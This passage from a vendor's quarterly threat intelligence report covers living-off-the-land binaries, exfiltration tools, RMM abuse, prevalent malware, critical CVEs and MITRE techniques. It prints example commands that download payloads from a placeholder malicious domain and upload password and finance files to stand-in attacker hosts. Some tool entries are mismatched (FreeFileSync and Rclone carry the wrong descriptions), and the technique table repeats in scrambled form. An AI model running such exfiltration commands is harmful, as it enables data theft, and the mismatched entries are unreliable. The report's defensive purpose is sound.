Below, we illustrate an example of malicious LOLBAS usage.

Figure 14: LOLBAS activity, July – September 2024.

File: Bitsadmin.exe

MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest

File: mofcomp.exe

MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Exfiltration Tools

Exfiltration Tools

Exfiltration tools are software used to transfer data out of a target environment, often for malicious purposes. This quarter, the CylanceMDR team reviewed the most prevalent tools that could be used for exfiltration (not including RMM tools) in our customer environments.

Figure 15: Percentage of exfiltration tools abused, July – September 2024.

WinSCP

Description: WinSCP is a file transfer client; PuTTY is a secure shell (SSH) client.

Example Command-Line: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Note: Commonly used with a graphical user interface (GUI).

MITRE ATT&CK ID: T1048

PSCP

Description: PuTTY Secure Copy Protocol (PSCP) is a command-line utility used for transferring files and folders.

Example Command-Line: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID: T1021.004

FileZilla

Description: FileZilla is a well-known file transfer protocol (FTP) tool that can be used across various operating systems.

Example Command-Line: filezilla.exe -u “ftp://test:p@ss1234[at]ftp.test[.]com” -e “put passwords.txt /remote_directory/pass.txt”

MITRE ATT&CK ID: T1071.002

FreeFileSync

Description: PuTTY Secure Copy Protocol (PSCP) is a command-line utility used for transferring files and folders.

Example Command-Line: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID: T1021.004

Rclone

Description: FreeFileSync is a synchronization tool that can be used to manage backups.

Example Command-Line: FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

MITRE ATT&CK ID: T1567.002

Remote Monitoring and Management Tools

Remote Monitoring and Management Tools

Threat actors abuse RMM tools. These tools provide attackers with an easy way to maintain persistent, simple access to systems and an efficient means of data exfiltration. As noted in our previous Global Threat Intelligence Report, this is the fastest growing category for ransomware groups who use these tools to exfiltrate data from victim environments. During this reporting period, the CylanceMDR team reviewed the most commonly exploited RMM tools seen in our customer environments.

During our analysis, we noted that many customers use multiple RMM tools within their environments, increasing their organization’s attack surface and risk.

Figure 16: This chart illustrates the percentage of attacks executed by abusing leading RMM tools.

 

Suggested mitigations include:

1. Audit Remote Access Tools

  • Identify currently used RMM tools within the organization.
  • Confirm they are approved within the environment.
  • If using multiple RMM tools, determine if they can be consolidated. Reducing the number of different tools used reduces the risk.

2. Disable Ports and Protocols

  • Block inbound and outbound network communication to commonly used ports associated with non-approved remote access tools.
  • Use default deny rules and allow listing rather than a blocklist approach when it comes to firewall rules and application control.

3. Monitor Endpoint Activity and Network Traffic

  • Detect abnormal use of remote access tools.

4. Patching

  • Ensure regular review of vulnerabilities associated with allowed RMM tools used, updating as necessary.
  • Prioritize Internet accessible systems when doing regular patch cycles.

5. Network Segmentation

  • Minimize malicious lateral movement by segmenting the network, limiting access to devices and data.

6. Device Tagging

  • Find out if your security vendor provides options to tag devices that use RMM tools. If so, enable this to ensure your SOC has visibility. Some vendors provide options to leave a note/tag identifying approved tools/activities, which greatly helps analysts during investigations.

7. Memory-Loading RMM

  • Use security software that can detect remote access that is only loaded in memory.

CylanceMDR Top Quarterly Threats

The most prevalent threats detected and responded to by the CylanceMDR analyst team during this reporting period are listed below.
Figure 17: Most prevalent threats detected and responded to by the CylanceMDR analyst team this quarter.
Figure 17: Most prevalent threats detected and responded to by the CylanceMDR analyst team this quarter.

Highlight: Alerts from the BlackBerry Incident Response Team

The BlackBerry Incident Response (IR) team provides mitigation for organizations that have suffered a malware attack or suspected data breach. During this quarter, our IR team witnessed an increase in attacks involving Internet-connected services and abuse of former employee credentials.

Internet-facing devices such as VPN devices were targeted more than usual this quarter. Unfortunately, these types of devices may not be sufficiently secured with multi-factor authentication. In some cases, this lack of MFA has enabled threat actors to deploy ransomware or other malware within a client’s environment and exfiltrate company data. This highlights the need for companies to properly secure all Internet-exposed systems in a timely manner (MITRE – External Remote Services) and to reduce the attack surface when possible, using modern alternatives like Zero Trust Network Access (ZTNA) solutions.

The abuse of account credentials of former employees is another common exploit. While employee credentials should be deprovisioned as soon as the worker leaves the company, this does not always happen. Old accounts can, potentially, give a threat actor full access to the organization’s network and systems. This underlines the need for companies to implement strong authentication security controls on all systems (MITRE – Valid Accounts).

Common Vulnerabilities and Exposures

Impact and Statistics

The Common Vulnerabilities and Exposures (CVEs) system offers a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. From July through September 2024, the National Institute of Standards and Technology (NIST) reported 8,659 new CVEs.

Although fewer CVEs were discovered this quarter compared to last, the level of criticality of these CVEs has increased significantly. Last quarter, 8% of CVEs had a severity score of 9.0 or above, whereas this quarter the percentage rose to a new high of 14%.

Figure 18: CVE Scoring July - September 2024.

The most critical CVEs logged this quarter:

CVE-2024-4879 (9.3 Critical) Arbitrary Code Execution: This ServiceNow vulnerability allows unauthenticated users to remotely execute code within the Now Platform. It involves a Jelly template injection vulnerability that exploits ServiceNow’s UI macros. This vulnerability can potentially be chained with CVE-2024-5178 (6.9 Medium) Unauthorized Access and CVE-2024-5217 (9.2 Critical) Arbitrary Code Execution, enabling unauthorized remote code execution on ServiceNow MID servers.

CVE-2024-43491 (9.8 Critical) Arbitrary Code Execution: Pertaining to Microsoft’s Service Stack, this vulnerability reintroduces previously mitigated vulnerabilities in Windows 10. It allows remote code execution without user interaction, potentially leading to full system compromise. Both a Service Stack update and a Windows security update have been released to patch this vulnerability.

CVE-2024-38194 (9.9 Critical) Authentication Bypass: This vulnerability arises from improper authorization within Azure web applications, allowing an authenticated attacker to elevate privileges over a network. If exploited, it could compromise the security of the applications and connected systems, leading to unauthorized data access, service disruption or malicious modification of application behavior.

CVE-2024-21416 (9.8 Critical) Arbitrary Code Execution: Related to a Windows TCP/IP Remote Code Execution (RCE) vulnerability, this exploitation could enable attackers to execute arbitrary code on the target system, potentially gaining full access.

CVE-2024-47575 (9.8 Critical) Authentication Bypass: Disclosed just outside the reporting period, the exploit known as “FortiJump” and tracked as CVE-2024-47575 involves zero-day attacks by the newly disclosed threat actor UNC5820. It abuses a flaw to execute API commands, allowing attackers to bypass authentication and execute commands on exploitable systems. Fortinet's October advisory stated that this vulnerability "may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests."

Prevalent Threats by Platform: Windows

FakeUpdates/SocGholish

Downloader

JavaScript-based downloader that presents fake browser updates to users. Known to download additional payloads including AZORult, GootLoader and RedLine.

Formbook/xLoader

Infostealer    

Sophisticated malware operating as both an infostealer and a downloader. Employs anti-VM techniques, process injection and custom encryption routines to bypass cybersecurity defenses. Steals data from browsers, email clients and various applications.

QakBot

Botnet/Dropper

First discovered in 2008, now on version 5.0. Provides extensive capabilities for data exfiltration and lateral movement. Known to deliver multiple malware types post-installation.

Agent Tesla

Infostealer

.NET-based infostealer sold as MaaS primarily used for credential harvesting. Despite a 2023 FBI/DOJ infrastructure takedown, it has reemerged with new persistence mechanisms to survive host restoration.

njRAT

Remote Access Trojan

RAT focused on capturing user data, with capabilities including camera access, credential theft, file interaction monitoring and keystroke logging.

AsyncRAT

Remote Access Trojan

Typically delivered alongside other malware. Receives C2 server commands to capture user data and terminate specific processes. Features botnet capabilities.

LummaC2

Infostealer

C-based infostealer targeting commercial enterprise and critical infrastructure organizations. Focuses on sensitive data exfiltration and is distributed via underground forums and Telegram groups.

Remcos

Remote Access Trojan

Remote control and surveillance application designed for unauthorized remote access and device control.

RedLine

Infostealer

Employs various applications and services to exfiltrate victim data including credit card information, passwords and cookies.

Phorpiex

Botnet

Botnet focused on malware delivery, known for involvement in X-rated extortion campaigns.

Prevalent Threats by Platform: Linux

Mirai

Botnet

Remains highly active, with the latest version exploiting zero-day vulnerabilities in CCTV cameras. The "Corona" variant spreads through malicious code injection in compromised cameras.

Gafgyt/Bashlite

Botnet

IoT-focused Linux botnet using C2 servers for large-scale DDoS attacks. The latest version targets weak SSH passwords for GPU crypto mining.

Play Ransomware

Ransomware

New variant specifically targeting ESXi environments, marking the group's first expansion to Linux systems from its previous Windows-focused double extortion attacks. Selectively encrypts files in Linux ESXi environments.

Hadooken

Botnet

New Linux malware combining crypto mining capabilities with DDoS attack tools. Targets vulnerabilities in systems including Oracle WebLogic Server.

Prevalent Threats by Platform: macOS

Atomic Stealer (AMOS)

Infostealer

New variants disguised as various apps distributed via DMG disk images. Targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.

Chtulu

Infostealer

MaaS-based infostealer distributed as a trojan DMG. Post-infection activities include harvesting keychain passwords, browser cookies, Telegram account information, cryptocurrency wallets and user data for C2 server upload.

Macma

Backdoor

Recent updates attributed to Chinese APT group Evasive Panda. Establishes persistence before deploying keylogger and media capture capabilities for data exfiltration to C2 servers.

TodoSwift

Downloader

Distributed through Bitcoin pricing PDF decoys. Attributed to North Korean group BlueNoroff and capable of downloading additional malicious binaries through C2 server connections.

Prevalent Threats by Platform: Android

Necro Trojan

Downloader

Distributed via Google Play store and malicious software development kits (SDKs). Capabilities include launching invisible ads, downloading additional payloads, installing third-party applications, executing additional code and C2 server communication.

Octo2

Infostealer

Distributed through trojanized versions of NordVPN and Google Chrome. An Exobot variant that primarily targets bank account information with remote access capabilities and C2 server communication.

Ajina

Infostealer

Distributed through social engineering and phishing, particularly via Telegram. Steals banking credentials and SMS data to intercept 2FA authentication from banking applications.

Common MITRE Techniques

Understanding threat groups’ high-level techniques can aid in deciding which detection techniques to prioritize. BlackBerry observed the following 20 techniques being used by threat actors in this reporting period.

Figure 19: Top 20 observed MITRE Techniques, June – September 2024.

Detected Techniques

The following table shows the top 20 techniques used by threat actors this quarter. An upward arrow (↑) in the “Change” column indicates that usage of the technique has increased since our last report. A downward arrow (↓) indicates that usage has decreased since our last report. An equals (=) symbol indicates that the technique remains in the same position as in our last report.

Technique Name Technique ID Tactic Name Last Report Change
Hijack Execution Flow
T1574
Persistence, Privilege Escalation, Defense Evasion
1
=
DLL Side-Loading
T1574.002
Persistence, Privilege Escalation, Defense Evasion
2
=
Virtualization/
Sandbox Evasion
T1497
Defense Evasion, Discovery
NA
System Information Discovery
T1082
Discovery
5
Input Capture
T1056
Credential Access, Collection
4
Software Discovery
T1518
Discovery
6
=
Security Software Discovery
T1518.001
Discovery
7
=
Scheduled Task/Job
T1053
Execution, Persistence, Privilege Escalation
19
DLL Search Order Hijacking
T1574.001
Persistence, Privilege Escalation, Defense Evasion
NA
Process Injection
T1055
Defense Evasion, Privilege Escalation
3
Masquerading
T1036
Defense Evasion
10
Process Discovery
T1057
Discovery
8
Create or Modify System Process
T1543
Persistence, Privilege Escalation
NA
Windows Service
T1543.003
Persistence, Privilege Escalation
NA
Boot or Logon AutoStart Execution
T1547
Persistence, Privilege Escalation
14
Registry Run Keys/Startup Folder
T1547.001
Persistence, Privilege Escalation
15
File and Directory Discovery
T1083
Discovery
9
Remote System Discovery
T1018
Discovery
13
Command and Scripting Interpreter
T1059
Execution
NA
Impair Defenses
T1562
Defense Evasion
17
Technique ID
Hijack Execution Flow
T1574
DLL Side-Loading
T1574.002
Virtualization/
Sandbox Evasion
T1497
System Information Discovery
T1082
Input Capture
T1056
Software Discovery
T1518
Security Software Discovery
T1518.001
Scheduled Task/Job
T1053
DLL Search Order Hijacking
T1574.001
Process Injection
T1055
Masquerading
T1036
Process Discovery
T1057
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon AutoStart Execution
T1547
Registry Run Keys/Startup Folder
T1547.001
File and Directory Discovery
T1083
Remote System Discovery
T1018
Command and Scripting Interpreter
T1059
Impair Defenses
T1562
Tactic Name
Hijack Execution Flow
Persistence, Privilege Escalation, Defense Evasion
DLL Side-Loading
Persistence, Privilege Escalation, Defense Evasion
Virtualization/
Sandbox Evasion
Defense Evasion, Discovery
System Information Discovery
Discovery
Input Capture
Credential Access, Collection
Software Discovery
Discovery
Security Software Discovery
Discovery
Scheduled Task/Job
Execution, Persistence, Privilege Escalation
DLL Search Order Hijacking
Persistence, Privilege Escalation, Defense Evasion
Process Injection
Defense Evasion, Privilege Escalation
Masquerading
Defense Evasion
Process Discovery
Discovery
Create or Modify System Process
Persistence, Privilege Escalation
Windows Service
Persistence, Privilege Escalation
Boot or Logon AutoStart Execution
Persistence, Privilege Escalation
Registry Run Keys/Startup Folder
Persistence, Privilege Escalation
File and Directory Discovery
Discovery
Remote System Discovery
Discovery
Command and Scripting Interpreter
Execution
Impair Defenses
Defense Evasion
Last Report
Hijack Execution Flow
1
DLL Side-Loading
2
Virtualization/
Sandbox Evasion
NA
System Information Discovery
5
Input Capture
4
Software Discovery
6
Security Software Discovery
7
Scheduled Task/Job
19
DLL Search Order Hijacking
NA
Process Injection
3
Masquerading
10
Process Discovery
8
Create or Modify System Process
NA
Windows Service
NA
Boot or Logon AutoStart Execution
14
Registry Run Keys/Startup Folder
15
File and Directory Discovery
9
Remote System Discovery
13
Command and Scripting Interpreter
NA
Impair Defenses
17
Change
Hijack Execution Flow
=
DLL Side-Loading
=
Virtualization/
Sandbox Evasion
System Information Discovery
Input Capture
Software Discovery
=
Security Software Discovery
=
Scheduled Task/Job
DLL Search Order Hijacking
Process Injection
Masquerading
Process Discovery
Create or Modify System Process
Windows Service
Boot or Logon AutoStart Execution
Registry Run Keys/Startup Folder
File and Directory Discovery
Remote System Discovery
Command and Scripting Interpreter
Impair Defenses

Prominent Adversary Techniques

This quarter, Hijacking Execution Flow (T1574) emerged as the most-used technique by adversaries with its sub-technique, DLL Side-Loading (T1574.002), ranking second. These methods involve attackers manipulating how operating systems execute programs such as by side-loading DLLs, often to bypass security systems.

Additionally, the rise of the Virtualization/Sandbox Evasion (T1497) technique into the top three is noteworthy. This suggests that the malware employed by the attackers had a strong anti-detection focus as indicated by the binaries studied to reach these conclusions.

Detected Tactics

In this quarter the top three tactics are Defense Evasion, Privilege Escalation and Persistence, as shown in Figure 20.

 

Figure 20: MITRE ATT&CK Tactics, June - September 2024

Looking Forward

This 90-day report, covering July through September 2024, is designed to help you stay informed and prepared for future threats. High-profile crime groups, especially ransomware operators, are exploiting new vulnerabilities and finding value in targets both large and small. As the report notes, BlackBerry researchers observed nearly two million attacks stopped this quarter alone. This level of activity makes it crucial to stay current with the latest security news for your industry and region.

Here's what to expect in the months ahead:

Telecommunications Under Siege

The telecommunications sector emerged as a prime target in 2024, exemplified by the AT&T breach that compromised call and text records across their network. As we move into 2025, we expect attackers to increasingly target telecom infrastructure rather than individual devices, allowing them to intercept communications at scale. The Salt Typhoon incident demonstrated how sophisticated actors can exploit network-level vulnerabilities to bypass traditional security measures. This shift from device-specific malware to infrastructure-level attacks presents a critical challenge, as organizations must now rethink their approach to securing sensitive communications across public telecom networks.

Infostealers and Stolen Data on Black Markets

Throughout 2024, infostealers have been a predominant feature of our quarterly threat reports. Notorious infostealers have often ranked high on our Top Threats lists and have appeared numerous times in attacks across the globe. According to Interpol, there was a 40% increase in dark web sales of logs collected from infostealers in 2023. Heading into 2025, it is expected to rise.

Patching and Exploitation

The exploitation of undisclosed or newly discovered vulnerabilities by threat actors, particularly ransomware gangs, is not a new phenomenon. However, the pace at which these CVEs are being exploited has made it increasingly challenging for IT professionals to keep up. This is particularly true in our hyper-connected world, with its myriad processes, applications and services. Cybercriminals are aware of this and actively seek to exploit any weaknesses in a business's IT infrastructure and security for gain.

During this reporting period, over 50% of all new CVEs scored above 7.0. The rapid exploitation of CVEs and the weaponization of proof-of-concepts (PoCs) are expected to remain significant challenges for the industry in the new year.

Ransomware Rebrands and Reemergence

Over the last few decades, law enforcement and cybersecurity professionals have been playing cat and mouse with ransomware developers and affiliates. However, as we mentioned in our section on Lynx ransomware, most groups are amalgamations of others, often rebranding and using other ransomware code or purchasing malicious code bases from other malware authors. This trend of rebranding, reemergence and reuse of ransomware will likely continue with the barrier of entry into the cybercrime space consistently lowering.

North Korean Remote Workers and False Identities

North Korean spies reportedly tried to infiltrate Western IT companies by posing as remote workers. These cybercriminals carefully crafted false identities, demonstrated the required skills to pass job interviews and tests, and masked their geolocations to avoid appearing as North Korean. In some cases, they used deepfake technology. Once hired, they attempted to exfiltrate internal data and install remote access utilities.

We predict that this trend of falsifying identities to infiltrate organizations will continue into 2025. It is likely that North Korea has deployed more of these covert operatives who have yet to be discovered and that they will likely evolve their tactics to better evade detection.

Visit the BlackBerry blog to stay current with evolving cybersecurity threats and defenses.

Legal Disclaimer

The information contained in the BlackBerry Global Threat Intelligence Report is intended for informational purposes only. BlackBerry does not guarantee or take responsibility for the accuracy, completeness and reliability of any third-party statements or research referenced herein. The analysis expressed in this report reflects the current understanding of available information by our research analysts and may be subject to change as additional information is made known to us. Readers are responsible for exercising their own due diligence when applying this information to their private and professional lives. BlackBerry does not condone any malicious use or misuse of information presented in this report.